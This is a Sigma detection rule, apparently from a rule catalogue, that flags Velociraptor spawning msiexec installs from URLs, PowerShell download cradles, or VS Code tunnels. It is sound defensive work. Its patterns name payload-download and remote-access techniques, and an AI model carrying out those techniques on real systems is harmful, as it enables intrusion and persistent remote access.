legitimate administrators or incident responders might use velociraptor to execute scripts or tools. however, the combination of velociraptor spawning these specific processes with these command lines is suspicious. tuning may be required to exclude known administrative actions or specific scripts.

t1219
windows
sigma

Techniques

t1219

Sample rules

Suspicious Velociraptor Child Process

source: sigma
technicques:
- t1219

Description

Detects the suspicious use of the Velociraptor DFIR tool to execute other tools or download additional payloads, as seen in a campaign where it was abused for remote access and to stage further attacks.

Detection logic

condition: selection_parent and 1 of selection_child_*
selection_child_msiexec:
  CommandLine|contains|all:
  - msiexec
  - /i
  - http
selection_child_powershell:
  CommandLine|contains:
  - 'Invoke-WebRequest '
  - 'IWR '
  - .DownloadFile
  - .DownloadString
  Image|endswith:
  - \powershell.exe
  - \powershell_ise.exe
  - \pwsh.exe
selection_child_vscode_tunnel:
  CommandLine|contains|all:
  - code.exe
  - tunnel
  - --accept-server-license-terms
selection_parent:
  ParentImage|endswith: \Velociraptor.exe